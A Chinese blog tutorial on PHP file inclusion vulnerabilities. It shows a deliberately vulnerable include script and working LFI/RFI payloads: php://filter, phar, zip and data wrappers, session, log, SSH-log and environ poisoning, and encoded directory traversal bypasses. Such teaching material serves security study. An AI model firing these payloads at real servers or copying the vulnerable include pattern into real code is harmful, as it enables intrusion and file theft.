PHP文件包含漏洞

0x01 文件包含函数

  • include()
  • include_once()
  • require()
  • require_once() 这里include()函数如果在包含的过程中发生错误,会发出警告,但是会继续执行后续代码;
    require()函数如果在包含的过程中发生错误,会报错退出,并且不再执行之后的代码。
    include_once()和require_once()的功能跟include()和require()类似,只不过前者如果已经包含了文件,那么就不会包含第二次,以免出现函数重定义或变量重赋值的问题。

以上四个函数不管包含的文件类型是什么,都会当作php文件进行解析,例如
phpinfo.txt

1
2
<?php
phpinfo();

lfi.php

1
2
3
4
<?php
$temp=$_GET['c'];
include($temp);
?>

成功执行phpinfo()!

0x02 文件包含分类

1. LFI(本地文件包含)

本地文件包含就是包含服务器本地的文件。

2. RFI(远程文件包含)

远程文件包含就是包含远程服务器上的文件,这样我们就可以自定义自己想要执行的代码,因此危害比较大。远程文件包含需要一定的条件
php.ini配置

1
2
allow_url_fopen=On(默认开启)
allow_url_include=On(默认关闭)

0x03 php伪协议

假设服务器lfi.php内容如下

1
2
3
4
<?php
$temp = $_GET['c'];
include($temp);
?>

php://input

使用条件

1
2
allow_url_include=On(默认关闭)
allow_url_fopen不做要求(默认开启)

php://filter

使用条件:无

··
?c=php://filter/read=convert.base64-encode/resource=xxx
或者
?c=php://filter/convert.base64-encode/resource=xxx
···
通过指定resource的值来读取文件,读取的文件是base64加密后的,读取到后解一下就好了。

phar://*

使用条件:php版本大于等于5.3.0

假设需要读取的文件是phpinfo.txt,将其压缩成zip文件(phpinfo.zip)

然后指定文件的绝对路径

1
?c=phar://C://wamp64/www/phpinfo.zip/phpinfo.txt

或者使用相对路径(这里phpinfo.zip就在当前路径)

1
?c=phar://phpinfo.zip/phpinfo.txt

zip://

使用条件:php版本大于等于5.3.0

zip://与phar://的使用类似,但是需要绝对路径, zip文件后面要跟%23加zip文件里的文件

1
?c=zip://C:/wamp64/www/phpinfo.zip%23phpinfo.txt

data:URL schema

使用条件:
php版本大于等于5.2.0
allow_url_include=On(默认关闭)
allow_url_fopen=On(默认开启)

1
?c=data:text/plain,<?php phpinfo();?>

或者

1
?c=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

session文件包含

使用条件:session文件路径已知,并且内容部分可控

session文件路径可以在phpinfo中session.save_path得到

一般情况下session文件都在/tmp目录下
命名格式:sess_[phpsessid],而phpsessid可以在cookie中得到

要包含并利用的话,需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候,可以先包含进session文件,观察里面的内容,然后根据里面的字段来发现可控的变量,从而利用变量来写入payload,并之后再次包含从而执行php代码。

包含日志文件

使用条件: 需要知道日志文件的目录,并且日志文件可读

当我们访问服务器的时候,访问的请求会被记录到access.log,当发生错误的时候会把错误写入到error.log,一般日志的路径linux下是/var/logs/apache2,windows下wamp在/wamp/logs
但是如果我们直接请求的话,一些特殊字符会被url编码从而导致包含后无法解析

可以用burp抓包后改包即可。

之后就可以包含进行利用啦

包含ssh-log

使用条件:ssh日志路径已知,并且可读,默认情况下在/var/log/auth.log

1
ssh '<?php phpinfo(); ?>'@remotehost

之后密码随便写
之后包含日志文件就好啦

environ

使用条件:

  1. php以cgi方式运行,这样environ才会保持UA头。
  2. environ文件存储位置已知,且environ文件可读。

proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到environ中。之后再包含它,即可。

条件竞争

0x04 绕过姿势

指定前缀

1
2
3
4
<?php
$file = $_GET['file'];
include '/var/www/html/'.$file;
?>

目录遍历

可以用../进行目录遍历,访问其他目录的文件

编码

但有的时候,服务器通常会把../过滤掉,这个时候可以用编码进行绕过
利用url编码
%2e%2e%5c
..%5c
%2e%2e\
%2e%2e%2f
..%2f
%2e%2e/
../
..\

二次编码
%252e%252e%255c
%252e%252e%252f
../
..\

容器/服务器的编码方式
../
..%c0%af
%c0%ae%c0%ae/
注:Why does Directory traversal attack %C0%AF work?

%c0%ae%c0%ae/
注:java中会把”%c0%ae”解析为”\uC0AE”,最后转义为ASCCII字符的”.”(点)
Apache Tomcat Directory Traversal
..\
..%c1%9c

指定后缀

1
2
3
4
<?php
$file = $_GET['file'];
include $file.'/test/test.php';
?>

?问号绕过

1
index.php?file=http://remoteaddr/remoteinfo.txt?

问号后面的部分/test/test.php,也就是指定的后缀被当作query从而被绕过。注意需要把#进行url编码为%23。

利用zip协议

可以构造跟后缀一样的路径,再打包成zip文件,然后利用zip协议包含即可

本文标题:PHP文件包含漏洞

文章作者:Pino-HD

发布时间:2018年05月30日 - 22:05

最后更新:2018年05月30日 - 22:05

原始链接:https://pino-hd.github.io/2018/05/30/PHP文件包含漏洞/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!